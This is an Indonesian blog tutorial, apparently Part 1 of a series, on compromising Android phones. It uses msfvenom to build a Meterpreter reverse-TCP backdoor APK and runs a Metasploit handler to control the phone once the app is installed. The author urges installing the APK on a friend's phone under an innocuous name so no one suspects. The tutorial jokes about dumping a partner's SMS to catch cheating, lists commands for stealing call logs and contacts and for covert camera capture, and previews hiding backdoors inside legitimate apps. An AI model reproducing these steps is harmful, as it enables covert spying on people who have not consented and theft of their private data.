Cara Exploit Android Dengan Metasploit [ Kali Linux ] [ LAN ] Part.1

Assalamualaikum Wr.Wb

                 Disini saya akan memberikan Tutorial cara exploit android dengan Metasploit di Kali Linux . Cara kerjanya adalah :

1. Membuat file .apk atau sebagai backdoor
2. Meneruskan Backdoor agar berjalan dengan Metasploit
3. Mengirim File dan Eksekusi File
4. Dump atau exploit

Bahan - bahan :

1. Kali Linux
2. Android ( Semua Versi )
3. Metasploit
4. WAIPAI /WI-FI yang bagustt ..... disini saya memakai wifi yang kenceng bener jadi tidak ada masalah sama sekali :v

LANGSUNG MULAI AJA GAUSAH BANYAK BCT !!

1. Membuat File APK

   Cek IP terlebih dahulu ... dan IP saya adalah 192.168.0.109 dan ingat ingat

#ifconfig

   Lalu buat file apk nya ...

#msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=444 R >tes.apk

   Keterangan :
         1. LHOST  : IP anda yang sudah anda cek tadi ( saya : 192.168.0.109 )
         2. LPORT  : Masukkan port ( Terserah berapa saja .. saya anjurkan 4444 )
         3. tes.apk   : ini adalah file backdoor anda ... anda dapat menamai apa saja , beri nama yg unik                                agar tidak curiga

    Cek pada file apk anda apakah ada atau tidak .. dan berikan pada teman anda atau install sendiri di smartphone teman anda

File berada pada /home

2. Jalankan Metasploit 

   Jalankan metasploit dengan perintah dibawah ini

#msfconsole 

untuk membuka metasploit

msf  > use exploit/multi/handler

msf exploit (handler) > set payload android/meterpreter/reverse_tcp

 msf exploit (handler) > set lhost 192.168.0.109

msf exploit (handler) > set lport 4444

msf exploit (handler) > exploit 

   Terminal akan berhenti pada starting the payload handler .... agar berjalan lagi anda harus menginstall file apk atau backdoor pada android anda atau teman anda....

3. Mengirim File & Eksekusi File

   Nama file yang tadi anda buat akan menjadi MainActivity sebagai defaultnya ,,, lalu anda install

   

    Setelah selesai install jangan langsung keluar dulu tetapi anda harus membuka file tersebut .. pilih open

4 . Metasploit

   Lalu terminal anda akan berjalan seperti dibawah ini .

   meterpreter > help

   Perintah diatas untuk melihat semua perintah yg bisa dilakukan metasploit

    Cek terlebih dahulu info device anda benar atau tidak

meterpreter > sysinfo

    Sekarang kita coba lihat SMS nya :v selingkuh atau tidak dia :v

meterpreter > dump_sms

   Setelah di dump anda akan melihat filenya di folder anda

/home

   Lalu kita buka dan....... TERNYATA ... SELINGKUH DENGAN OPERATOR AXOS :V gaboleh nyebut merk

Selebihnya anda kembangkan sendiri exploit anda dan anda dapat mencari perintah exploit di perintah help

meterpreter > help

Disitu akan banyak sekali perintah untuk dump :V beberapa contoh dibawah :
    
    - dump_callog ( untuk melihat log panggilan )
    - dump _contacts ( untuk melihat contact )
    - dump_snap ( untuk mengambil gambar dari kamera handphone )
    - dump_stream ( untuk memutar video secara live atau stream )

Sebenarnya masih ada cara lain yaitu menyisipkan file backdoor pada file apk , jadi apk file apa saja dapat dijalankan misalnya file instagram.apk dan sesudah diinstall dapat berjalan seperti biasa atau instagram biasa dan kita bisa mengakses HP victim tanpa ada curiga :v nanti di PART 2 ya.... 

Ada juga Exploit untuk beda jaringan ( Part 3 )
Jadi itu saja yang dapat saya sampaikan kurang lebihnya mohon maaf ...

Wassalamualaikum Wr.Wb